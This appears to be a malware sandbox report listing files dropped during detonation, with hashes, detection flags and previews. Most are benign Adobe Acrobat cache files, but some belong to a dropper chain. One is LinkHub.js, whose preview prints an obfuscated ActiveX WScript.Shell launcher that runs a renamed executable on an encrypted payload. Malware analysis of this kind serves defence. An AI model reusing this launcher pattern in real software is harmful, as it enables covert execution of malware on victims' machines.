                                                                                      SHA1:FA20372F31C7D00BED4548E2AA737E556D7F5B92
                                                                                      SHA-256:88FA583B9315329E53D16CE52AEE0359A2BF3FD8B5E0A0F0C698BAB383F4E0EF
                                                                                      SHA-512:2A8882A0AB05BE28D3B6467965FCA03EFCFE0787B0A784AC757CA4F48E31576195C343F881F499AB9551F3134EB949F1BBB183724F7FFFFC8FD12A7B7BF4173C
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):287
                                                                                      Entropy (8bit):5.29718062186088
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJf21rPeUkwRe9:YvXKXFsqZc0vKsG+16Ukee9
                                                                                      MD5:CF40C1D254E110323332428CA4A1ABA6
                                                                                      SHA1:F02353EF7C416AD3D33152E35343D07C2C2CDF10
                                                                                      SHA-256:4707E077AB9A57B30C22217AF7933902DAAF761C637611E5A5888BB67EFCE1CF
                                                                                      SHA-512:318FD7FC1BDB45B7E1EC5495702C3BB39C84AECDA97FE5C418C4E982062EC3B4160FAF66C77296B175C9246218567810699361CAF7FB950F65B8A25DC6496037
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1090
                                                                                      Entropy (8bit):5.659208742956334
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yv6XdzvOamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSD:YvqoBgkDMUJUAh8cvMD
                                                                                      MD5:520B66460B9F23AC9A19D4D5BE501259
                                                                                      SHA1:F5BAAF1DA56521182D00E8D89D7F0B9D651922DC
                                                                                      SHA-256:709EB074F902B0256C6A9A16E52A610FC8FB324C75253A6A1B051DCDC84B276D
                                                                                      SHA-512:BEC595CCB29A12832F4B2C4583D1A77AE38888C06395A9DE30254FE9B50B52A500DF75C1F3D4243534DED542917F6429B34DE04BA7B1D857CF719862D024ED64
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):286
                                                                                      Entropy (8bit):5.272363827994723
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfshHHrPeUkwRe9:YvXKXFsqZc0vKsGUUUkee9
                                                                                      MD5:F177BB5A61DE84F892362F10E296CE68
                                                                                      SHA1:DB0A79A0471FC8C76C2E5EAD7414A7332F96E3FA
                                                                                      SHA-256:0F7CEE3467D7F79810103A60151AD5AEC3298BF3BC788A9887531B64DC25BE4E
                                                                                      SHA-512:339E9E65A9151F86F59D5AC039B7FB864F4F632161FF15C229F1DEA871B5BC068AF3355EE818B785B9849252F9ECE65F58ED45C6AC851C64B42BE670ED1AEB8F
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):282
                                                                                      Entropy (8bit):5.276902353482643
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJTqgFCrPeUkwRe9:YvXKXFsqZc0vKsGTq16Ukee9
                                                                                      MD5:3FC190355DC07A0E77A86546CB39B0D9
                                                                                      SHA1:2BF25DED3822858171A0B6811F8378CCB78E2EFB
                                                                                      SHA-256:30A3FC14B8F744D8F521ABA3CEBF1A32B6A32C754070A2B1386D97C74D96DF21
                                                                                      SHA-512:970EF113E55CE099D0A5FD5243F3EB096AA5FCDEE3D784289B992EF30597A3B1D8AB2C2690023952F7DE22564F1D864969DBC66990B0B856575710C35DF02BDB
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4
                                                                                      Entropy (8bit):0.8112781244591328
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:e:e
                                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                      Malicious:false
                                                                                      Preview:....

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):2814
                                                                                      Entropy (8bit):5.140567634433077
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:YSNFLqQqWS2A/1vu1c0eA/3WMlqGb8ymg9mRvK9o8u:aQwP92CKEymiBO
                                                                                      MD5:5EC026FCF8AA010007238E85FA9DB602
                                                                                      SHA1:25BF9E8FF25955C54CD494253BA022963031F012
                                                                                      SHA-256:1AFC0C5C020B2393451A60A77F40B1F45057477102859485031948B6DD630B96
                                                                                      SHA-512:5A958FFDC3A09E659A20EC6C97856114386DE19A0F1E77BD9168A1D30EBD6F7B0B9C8E6BDF172B202B3E755EEF603F95192F7225690C7D3D0A421E209F576113
                                                                                      Malicious:false
                                                                                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"54b8f85df2f1c37b24e90874b892f3e0","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736632393000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"f36098da6ad63fb63a8a1cd23e687ed3","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736632393000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"13d9da234d87eb9915ac3a31f5eff872","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736632393000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"6569a48c3ddd0f653412f01fc6fc1360","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736632392000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"e9eedb78dc520c28be15b7fb444dd376","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736632392000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"7c052792ccbd7f063052a3471d7bccd9","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                      Category:dropped
                                                                                      Size (bytes):12288
                                                                                      Entropy (8bit):1.1878850223469222
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:TGufl2GL7msEHUUUUUUUUzSvR9H9vxFGiDIAEkGVvp3:lNVmswUUUUUUUUz+FGSItr
                                                                                      MD5:ADABC56561F882095122E32181D9EA9C
                                                                                      SHA1:753C72402E1F25E52B5543953A310CDD2126E57A
                                                                                      SHA-256:C6C7388CEE3E3C55ADEE80B3DEFE5FD233DD681B9FB24534145C2B1E5EAAA90B
                                                                                      SHA-512:DB5A16786628C4E046EE4C71B5F1FB8ED46C40C3034C65757089AAD2355A8058A4FC5581282CE0EB4B5ED8413E8FCC6007B3B34653E923824E2E270CB8C99745
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite Rollback Journal
                                                                                      Category:dropped
                                                                                      Size (bytes):8720
                                                                                      Entropy (8bit):1.6065169864181135
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:7MlKUUUUUUUUUU3vR9H9vxFGiDIAEkGVvOqFl2GL7msf:7zUUUUUUUUUUPFGSItYKVmsf
                                                                                      MD5:D00D9B66049D4A95C4C5DE83FE1FA238
                                                                                      SHA1:212AC73F8421CBF3ED48CDF4100B186E9C458EEA
                                                                                      SHA-256:15677169806E5406EBF8B4B7A5ED2CED357055A4953B83FDA600B616CCC9310A
                                                                                      SHA-512:C67194C6A11E6B3F563E7CC7368D5F499B08E70F015676314A3703F20864D4977064F5CB007202F0FFCD3B8B552F4191340EC01AEB0C9143D09A6B1B56BAA003
                                                                                      Malicious:false
                                                                                      Preview:.... .c.....KQhy......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):66726
                                                                                      Entropy (8bit):5.392739213842091
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RNOpblrU6TBH44ADKZEg7WVZ5cvFpiU8DF4MjIUKoPAdYyu:6a6TZ44ADE7WZ5cvFpiGvdK
                                                                                      MD5:70A47D0187D9E33A5DB5827C793F9BD2
                                                                                      SHA1:4CC535E7B48399040285834FE5515931BA2B5291
                                                                                      SHA-256:438BD66E6B419BABEFDFA9B581CC8CF5FF5C30A3DAE614EDDDC9EA1C93160EE0
                                                                                      SHA-512:57DEA1616FB45DDD8EE092BA593AEC930514E58F494C3A93052ED0ADA34CA82C4782032CC9FA0D5B39442B6F8D6E3914FB5B9FB11480FCA016E24B5134C6471B
                                                                                      Malicious:false
                                                                                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                      C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):947288
                                                                                      Entropy (8bit):6.630612696399572
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: c2.hta, Detection: malicious, Browse
                                                                                      • Filename: Setup.exe, Detection: malicious, Browse
                                                                                      • Filename: Setup.exe, Detection: malicious, Browse
                                                                                      • Filename: Setup.exe, Detection: malicious, Browse
                                                                                      • Filename: Full-Ver_Setup.exe, Detection: malicious, Browse
                                                                                      • Filename: random.exe, Detection: malicious, Browse
                                                                                      • Filename: HouseholdsClicking.exe, Detection: malicious, Browse
                                                                                      • Filename: DodSussex.exe, Detection: malicious, Browse
                                                                                      • Filename: DangerousMidlands.exe, Detection: malicious, Browse
                                                                                      • Filename: PortugalForum_nopump.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):195
                                                                                      Entropy (8bit):4.7615351185197845
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:RiOnJHonwWDKaJkDHLFkNx5AW9GfwWDKaJkDHLFkNx57:YIQjWaiF+/dG7WaiF+/7
                                                                                      MD5:9DD76500C74BBB507074A3DA164E755D
                                                                                      SHA1:72EBC79800AD7A96DCC8923A186D7ECA36561F28
                                                                                      SHA-256:6801E9D84DF9CAAB43718B737D58E5E3CD3CB614DBAFEB50776630FCD8E6694C
                                                                                      SHA-512:531E901749A8C5687310E8330A8558384A94C28587AC8B6B3EE362449F2C46B9F27BBF3C162095A030D880E6693E477F62FAB7A2C24F7D89FED0AC0E09A8C494
                                                                                      Malicious:true
                                                                                      Preview:new ActiveXObject("W"+"script.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\LinkHub.com\" \"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\y\"")

                                                                                      C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):702975
                                                                                      Entropy (8bit):7.9996899596807305
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
                                                                                      MD5:40320097845035E71C88A2796F2F751B
                                                                                      SHA1:C6002D6BEC7322277FE88154FDE0829C8A8E2762
                                                                                      SHA-256:62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
                                                                                      SHA-512:57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
                                                                                      Malicious:false
                                                                                      Preview:....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.....*....,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{|.8.L.o;,.V...vC...B.p.X(T%..q..T..z....*......M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[.*.I...?.v.tfJ..9....+..*J.....g.....g.WK.....\

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):947288
                                                                                      Entropy (8bit):6.630612696399572
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\U

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):702975
                                                                                      Entropy (8bit):7.9996899596807305
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
                                                                                      MD5:40320097845035E71C88A2796F2F751B
                                                                                      SHA1:C6002D6BEC7322277FE88154FDE0829C8A8E2762
                                                                                      SHA-256:62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
                                                                                      SHA-512:57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
                                                                                      Malicious:false
                                                                                      Preview:....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.....*....,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{|.8.L.o;,.V...vC...B.p.X(T%..q..T..z....*......M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[.*.I...?.v.tfJ..9....+..*J.....g.....g.WK.....\

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Approaches

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:Microsoft Cabinet archive data, 488285 bytes, 11 files, at 0x2c +A "Instantly" +A "Dressing", ID 8829, number 1, 29 datablocks, 0x1 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):488285
                                                                                      Entropy (8bit):7.998550946105718
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:GtaS7z1F+D7f32HLxjQ8IeOFg8CAINNtUcfgBTG12Zqc:+aS7zqDcLxk8Ie5ZNN6cQqwZqc
                                                                                      MD5:7A07DED0E02828AA5F3CFBAD5642C558
                                                                                      SHA1:166EAD6F90D79790E559C7CB19BC2588E6EDBAE1
                                                                                      SHA-256:2089D963BDAD621F966AC18E371FBF4BDD2E94CFA1841142EDF317E4B971F28B
                                                                                      SHA-512:9DA78695AC581646ADBA790FBBFEE3E2E26DA4F60C75FCABCF11D30E06054D59C6E3A764B4828EEBC6592E7FE5255BF1778AE1A8877D60E1A45C971B9D2586D6
                                                                                      Malicious:false
                                                                                      Preview:MSCF....]s......,...............}"..<........`........'Z.% .Instantly......`....'Z.% .Dressing......x....'Z.% .Measurement..$...|....'Z.% .Indonesia..@.......'Z.% .Led...........'Z.% .Different...........'Z.% .Missed...........'Z.% .Clinton..|........'Z.% .Brian..........'Z.% .Protocol..4..]@....'Z.% .Constitute...b..K..CK...|...0>..,.Y1.......ltA.K$.l.H.....[..>.....'[..n...Zk...>..m..Uw...~..Jb..E..DX>.l d.s..n....y...~.s?.=..{.=..s........[.Fwm.g..\OR..q.l'..>.G...|..r.s9..p...>..[.B.\....e.99"..ub...x......i(.r.........S2.)..3.8.xXl........o#..YE.(...%...7Z.N.....|.F.f..l..H.b...KI..1..mm.3.B.V....x.V..{..f..p.Z....V[%.T.....r......^.S@*w.#..r...lQ.&b?P..Y.]MN~(.b.Ja........-..1..T.m...\v...v...>.......0...a.K.X.X..ib.I..#q.....K....."...).4...d..F.,....62>.X.e.7....7..i..[.(....[.5..m..Y#"....."~.9xz..S.....j..i.][7NU...2k..__...|uL.*....M..Y..rP..7.....F..Q......B$.O...ZO.]n.U..n..z..;Jj..H...Q...G/K..+c.MEj.l..j.*...Jl..[l..|.~.....f.*.>..

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Beam

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):67584
                                                                                      Entropy (8bit):7.997420919125293
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:mPM2IWHYOOcbdpzCNBSD2XTn32zuIcRgk64wnWEi8o:mP5THh5b3+n32zo64Ao
                                                                                      MD5:18E13DD846278DD017E9BDD8322ACF0E
                                                                                      SHA1:431DDC2AF8197F887CF7E9B5346792FDBF0F07E3
                                                                                      SHA-256:4784DDD355896DE73BCCCDB7D0AFD69D6376ADE1F3A22B18BFDA58EB4DFB0744
                                                                                      SHA-512:005CBE957E2FE900299A82168D0CEB4FF9A89FE82B407103A7DA34BED1C0F12CF22850080D2EB22FAD5A0BAC7813696103BAFCA6735FB31223BEFFF0697CCE2F
                                                                                      Malicious:false
                                                                                      Preview:.w..+..h}...X.M....N..h.y.......>...e......pD..{..S....u....8...!.9.....Q.G..rB...d.._..q.~...}8.../.CW.E.`.......c.}..x...M..H..,Mk...N..K......G.>..F.Ru....-....9.Y...q...3$.iN.!.|.g...n...k..W.i..g..J.L.....P.....F'{6}.i.<,a}..i.....]"......y.yi.+..C..-^j....T.6..j.5..f..&..DN4.$B.i.&..#..K..d......."...."U...r...Qm..V....6....e.....X.vw...I..B<ei....}.>l._,......H.kq.5...........{.QT.Z'.dF[...fkMH$V%....K....y.M..b.G....lv.....>.q..n...-..D7;F~...Ix..AL.5.}......0..9X..w.I...o..\...a.<..a&<...t(.iz.?.N...mx.o...O.b.}5G.~.c.#.....==...O..RY......o..]...G?=.<.;...N.^.E.2.3....=...X*C.6..XC.)H<......4.?>\...Ng...C.vHLv<..A..u.p*-qs.G)z.8|.s.<V.._..6.`.^..#.^..._o...4..^h....!"&I...>....b...'.=I(.'e..!..Z..R1;..3A..F/.Jwr.GcX*GO?.t...f^1G...cF..@.iC.U.8.#..$..p......e2....U..j.c....q..V.rL....xf...F..X85.5.L#K.T.s..a.c`......z_.Y..9E.6......>...x2...=.d..`...^.U.p~..n.U.#........S.BY..n/........]..M....1...J8..%.:..l..s.8...\....J...D.y.

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Blocked

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):101376
                                                                                      Entropy (8bit):7.9982174281872025
                                                                                      Encrypted:true
